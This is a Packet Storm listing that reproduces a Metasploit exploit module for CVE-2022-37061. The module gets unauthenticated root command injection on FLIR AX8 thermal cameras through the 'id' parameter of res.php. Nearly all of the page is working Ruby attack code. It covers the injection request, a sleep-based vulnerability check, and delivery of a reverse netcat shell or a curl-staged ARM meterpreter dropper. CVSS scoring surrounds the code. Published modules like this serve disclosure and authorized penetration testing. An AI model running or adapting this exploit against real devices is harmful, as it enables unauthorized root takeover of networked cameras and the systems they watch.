Lucene search

K
packetstormSamy Younsi, Thomas Knudsen, h00die-gr3y, metasploit.comPACKETSTORM:169701
HistoryNov 02, 2022 - 12:00 a.m.

FLIR AX8 1.46.16 Remote Command Injection

2022-11-0200:00:00
Samy Younsi, Thomas Knudsen, h00die-gr3y, metasploit.com
packetstormsecurity.com
234

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rex/stopwatch'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'FLIR AX8 unauthenticated RCE',  
'Description' => %q{  
All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.  
This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter  
in the res.php endpoint.  
  
This module uses the vulnerability to upload and execute payloads gaining root privileges.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher  
'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher  
'h00die-gr3y' # metasploit module  
],  
'References' => [  
['CVE', '2022-37061'],  
['PACKETSTORM', '168114'],  
['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],  
],  
'DisclosureDate' => '2022-08-19',  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD, ARCH_ARMLE],  
'Privileged' => true,  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_netcat'  
}  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_ARMLE],  
'Type' => :linux_dropper,  
'CmdStagerFlavor' => [ 'curl', 'printf' ],  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 80,  
'SSL' => false  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
end  
  
def execute_command(cmd, _opts = {})  
action_id = rand(1..40)  
return send_request_cgi({  
'method' => 'POST',  
'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',  
'uri' => normalize_uri(target_uri.path, 'res.php'),  
'vars_post' => {  
'action' => 'alarm',  
'id' => "#{action_id};#{cmd}"  
}  
})  
rescue StandardError => e  
elog("#{peer} - Communication error occurred: #{e.message}", error: e)  
print_error("Communication error occurred: #{e.message}")  
return nil  
end  
  
# Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  
def check  
print_status("Checking if #{peer} can be exploited!")  
sleep_time = rand(5..10)  
print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")  
res, elapsed_time = Rex::Stopwatch.elapsed_time do  
execute_command("sleep #{sleep_time}")  
end  
  
return Exploit::CheckCode::Unknown('No response received from the target!') unless res  
  
print_status("Elapsed time: #{elapsed_time} seconds.")  
return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time  
  
CheckCode::Vulnerable('Successfully tested command injection.')  
end  
  
def exploit  
case target['Type']  
when :unix_cmd  
print_status("Executing #{target.name} with #{payload.encoded}")  
execute_command(payload.encoded)  
when :linux_dropper  
print_status("Executing #{target.name}")  
execute_cmdstager  
end  
end  
end  
`

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H